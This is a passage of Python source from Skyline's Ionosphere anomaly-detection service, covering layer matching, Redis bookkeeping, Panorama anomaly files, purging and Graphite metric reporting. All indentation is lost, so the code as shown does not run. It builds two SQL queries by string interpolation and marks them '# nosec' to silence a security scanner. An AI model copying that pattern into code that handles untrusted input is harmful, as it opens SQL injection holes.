logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
matched_layers_id = None
for layers_id in fp_layers_ids:
if not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to Redis set here and commented out the
# self.layers_checked.append in the try below this
redis_set = 'ionosphere.layers_checked'
data = layers_id
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to the ionosphere.layers_checked Redis set
# above
# self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learning from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
remove_waterfall_alert(added_by, metric_timestamp, base_name)
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(base_name)
redis_set = 'ionosphere.anomalous_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the Redis set function below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
logger.info(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'ionosphere.sent_to_panorama'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# added 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# Added cache_key_value
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(
# cache_key, 300,
# # modified 20190412 - Task #2824: Test redis-py upgrade
# # Task #2926: Update dependencies
# # [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
# str(cache_key_value))
# logger.info(
# 'add Redis alert key - %s - %s' %
# (cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if dev_null:
del dev_null
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process intializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
logger.info('SKYLINE_FEEDBACK_NAMESPACES is set to %s' % str(SKYLINE_FEEDBACK_NAMESPACES))
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @added 20191115 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
continue
# Report app up
try:
# @modified 20210524 - Branch #1444: thunder
# Report app AND Redis as up
# self.redis_conn.setex(skyline_app, 120, now)
# logger.info('updated Redis key for %s up' % skyline_app)
redis_is_up = self.redis_conn.setex(skyline_app, 120, now)
if redis_is_up:
logger.info('updated Redis key for %s up' % skyline_app)
try:
self.redis_conn.setex('redis', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error('error :: failed to update Redis key for %s up - %s' % (skyline_app, e))
# @modified 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Wrapped purging up in a conditional to allow the user to offload
# purging to a script and cron if they so desire for any reason.
if IONOSPHERE_MANAGE_PURGE:
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
# @added 20200723 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Do not purge every run
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
else:
logger.info('purge is not managed by Ionosphere - IONOSPHERE_MANAGE_PURGE = %s' % str(IONOSPHERE_MANAGE_PURGE))
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage training data
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('running purge_old_data_dirs only to manage ionosphere.training_data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# self.populate the database metatdata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# host_id = self.memcache_client.get(hosts_id_key)
if python_version == 2:
host_id = self.memcache_client.get(hosts_id_key)
else:
host_id = self.memcache_client.get(hosts_id_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine populate %s into the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric has been added to add
"""
# while True:
while 1:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Process the ionosphere.echo.work queue as echo features
# profiles cannot be easily shoehorned into the
# ionosphere.learn.work pipeline
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
echo_job = False
if not metric_var_files and ionosphere_echo_enabled:
ionosphere_echo_work = None
echo_job = False
try:
ionosphere_echo_work = self.redis_conn_decoded.smembers('ionosphere.echo.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.echo.work - %s' % e)
if ionosphere_echo_work:
echo_work_queue_items = len(ionosphere_echo_work)
if echo_work_queue_items > 0:
echo_job = True
logger.info('processing a ionosphere.echo.work item')
if echo_job:
for index, ionosphere_echo_work in enumerate(ionosphere_echo_work):
try:
echo_metric_list = literal_eval(ionosphere_echo_work)
echo_metric_timestamp = int(echo_metric_list[2])
echo_base_name = str(echo_metric_list[3])
echo_full_duration = int(echo_metric_list[6])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from ionosphere_echo_work item')
continue
if not echo_base_name:
echo_job = False
if echo_job:
# When an item is in the ionosphere.echo.work set it needs
# metric_echo_check_file created to pass to process_ionosphere_echo
echo_metric_check_file = '%s/%s.%s.echo.txt' % (
settings.SKYLINE_TMP_DIR, str(echo_metric_timestamp),
echo_base_name)
echo_create_fp_metric_key = 'ionosphere.%s.%s.echo_create_check' % (
str(echo_metric_timestamp), echo_base_name)
echo_create_fp_metric_count = 1
try:
echo_create_fp_metric_count = self.redis_conn.get(echo_create_fp_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for %s: %s' % (echo_metric_check_file, e))
if not echo_create_fp_metric_count:
echo_create_fp_metric_count = 1
else:
echo_create_fp_metric_count += 1
if os.path.isfile(str(echo_metric_check_file)):
logger.error('error :: echo_metric_check_file - %s already exists, removing' % (
echo_metric_check_file))
self.remove_metric_check_file(echo_metric_check_file)
if echo_create_fp_metric_count >= 3:
logger.error('error :: echo_create_fp_metric_count is %s, no further attempts will be made to create an echo fp for %s' % (
str(echo_create_fp_metric_count), str(echo_metric_list)))
logger.info('removing ionosphere.echo.work item %s' % (
str(echo_metric_list)))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
echo_job = False
if echo_job:
check_data = 'metric = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'added_by = \'%s\'\n' \
'full_duration = \'%s\'\n' \
% (str(echo_base_name), str(echo_metric_timestamp),
'webapp', str(echo_full_duration))
echo_metric_check_file_created = False
try:
write_data_to_file(skyline_app, echo_metric_check_file, 'w', check_data)
logger.info('added ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
echo_metric_check_file_created = True
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
if echo_metric_check_file_created:
# Set a Redis key so that if the echo fp creation fails
# a continous loop to try to create it does not occur
try:
self.redis_conn.setex(echo_create_fp_metric_key, 3600, echo_create_fp_metric_count)
logger.info('updated Redis key %s' % echo_create_fp_metric_key)
except:
logger.error('error :: failed to update Redis key %s' % echo_create_fp_metric_key)
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, echo_metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s for ionosphere.echo.work item' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s for ionosphere.echo.work item' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds for ionosphere.echo.work item' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
self.remove_metric_check_file(echo_metric_check_file)
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes for ionosphere.echo.work item' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process for ionosphere.echo.work item' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes for ionosphere.echo.work item' % function_name)
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
# @modified 20200507 - increase the allowed time
# while time() - p_starts <= 5:
while time() - p_starts <= 20:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
logger.info('metric check files found - %s' % str(len(metric_var_files)))
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# not_anomalous = str(len(self.not_anomalous))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# not_anomalous = str(len(list(self.redis_conn.smembers('ionosphere.not_anomalous'))))
not_anomalous = str(len(list(self.redis_conn_decoded.smembers('ionosphere.not_anomalous'))))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager() list
# total_anomalies = str(len(self.anomalous_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# total_anomalies = str(len(list(self.redis_conn.smembers('ionosphere.anomalous_metrics'))))
total_anomalies = str(len(list(self.redis_conn_decoded.smembers('ionosphere.anomalous_metrics'))))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# training_metrics = str(len(self.training_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# training_metrics = str(len(list(self.redis_conn.smembers('ionosphere.training_metrics'))))
training_metrics = str(len(list(self.redis_conn_decoded.smembers('ionosphere.training_metrics'))))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# features_profiles_checked = str(len(self.features_profiles_checked))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# features_profiles_checked = str(len(list(self.redis_conn.smembers('ionosphere.features_profiles_checked'))))
features_profiles_checked = str(len(list(self.redis_conn_decoded.smembers('ionosphere.features_profiles_checked'))))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# str_layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(list(self.redis_conn.smembers('ionosphere.layers_checked'))))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('ionosphere.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('ionosphere.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s up' % cache_key)
# Reset lists
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous[:] = []
# self.features_profiles_checked[:] = []
# self.training_metrics[:] = []
# self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.layers_checked[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'ionosphere.anomalous_metrics',
'ionosphere.not_anomalous',
'ionosphere.features_profiles_checked',
'ionosphere.training_metrics',
'ionosphere.sent_to_panorama',
'ionosphere.layers_checked',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
ionosphere_job = False
learn_job = False
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if the namespace is a declared SKYLINE_FEEDBACK_NAMESPACES
# namespace that has been checked in the last 10 minutes if
# there are multiple checks to do.
rate_limit_feedback_metrics = False
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
metric_var_files_count = len(metric_var_files_sorted)
if metric_var_files_count > 2:
rate_limit_feedback_metrics = True
